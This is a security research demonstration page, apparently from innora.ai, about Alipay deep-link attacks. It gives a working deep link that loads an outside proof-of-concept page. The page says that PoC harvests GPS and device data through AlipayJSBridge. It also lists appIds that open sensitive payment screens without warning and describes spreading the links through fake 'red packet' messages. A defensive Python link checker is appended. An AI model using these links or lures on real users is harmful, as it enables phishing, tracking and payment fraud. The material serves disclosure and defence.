Alipay DeepLink Attack Demo

Security Research Trigger Page | innora.ai

SECURITY RESEARCH DEMONSTRATION
This page simulates how an attacker would distribute malicious DeepLinks via SMS/WeChat/QQ. In a real attack, this page would be disguised as a "red packet" or "prize claim" page.

Buttons below trigger Alipay DeepLinks. On a device with Alipay installed, clicking will open Alipay directly.

Full report: innora.ai/zfb

CRITICAL Attack Chain A: JSBridge Exploitation

Opens an Alipay WebView and loads our PoC page, which calls AlipayJSBridge APIs to collect GPS and device info and to demonstrate UI spoofing.

Chain A: JSBridge PoC (Android Chrome)
alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/verify.html

HIGH Attack Chain B: Zero-Interaction DeepLinks

These DeepLinks open sensitive Alipay pages directly. No additional warning is shown.

Transaction History (appId=20000003)
Transfer Contacts (appId=20000116)
Payment QR Code (appId=20000123)
Yu'E Bao Balance (appId=20000032)
Security Settings (appId=20000052)
Bank Card Management (appId=20000193)

How This Works

1. Attacker distributes this page via SMS/WeChat/QQ (disguised as a "red packet")
2. Victim clicks a button in their mobile browser
3. Browser triggers the intent:// scheme, which opens Alipay
4. For Chain A: Alipay loads the attacker's page in a WebView with AlipayJSBridge injected
5. For Chain B: Alipay navigates directly to the sensitive page, with no extra warning
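
Both chains depend on the app acting on an externally supplied link without a policy decision. The following is an added example, not code from this page or from Alipay, of the check a deep-link handler or a message-scanning gateway could apply before steps 4 and 5. The trusted host `pay.example.com` and the decision names are assumptions; the appId table is the one listed above.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts the app itself trusts to run with the JS bridge (hypothetical).
BRIDGE_TRUSTED_HOSTS = {"pay.example.com"}
# appIds this page lists as opening sensitive screens.
SENSITIVE_APP_IDS = {
    "20000003": "Transaction History",
    "20000116": "Transfer Contacts",
    "20000123": "Payment QR Code",
    "20000032": "Yu'E Bao Balance",
    "20000052": "Security Settings",
    "20000193": "Bank Card Management",
}


def unwrap_intent(link):
    """Turn an Android intent:// URI into the scheme:// link it carries."""
    parts = urlsplit(link)
    if parts.scheme != "intent":
        return link
    # The fragment looks like "Intent;scheme=alipays;...;end".
    fields = dict(f.split("=", 1) for f in parts.fragment.split(";") if "=" in f)
    return fields.get("scheme", "") + link[len("intent"):].split("#", 1)[0]


def host_trusted(url):
    """Exact or dot-suffix host match over https only; never a substring match."""
    target = urlsplit(url)
    host = (target.hostname or "").lower()  # hostname drops any user@ prefix
    return target.scheme == "https" and any(
        host == h or host.endswith("." + h) for h in BRIDGE_TRUSTED_HOSTS)


def evaluate(link):
    """Return (decision, reason) for a deep link that arrived from outside the app."""
    parts = urlsplit(unwrap_intent(link))
    if parts.scheme != "alipays":
        return ("ignore", "not an alipays link")
    query = parse_qs(parts.query)
    app_id = query.get("appId", [""])[0]
    # Chain A: an external url must not reach a bridge-enabled WebView.
    for url in query.get("url", []):
        if not host_trusted(url):
            return ("block", "untrusted url for bridge-enabled WebView")
    # Chain B: sensitive screens need an explicit in-app confirmation.
    if app_id in SENSITIVE_APP_IDS:
        return ("confirm", SENSITIVE_APP_IDS[app_id])
    return ("allow", "no policy hit")
```
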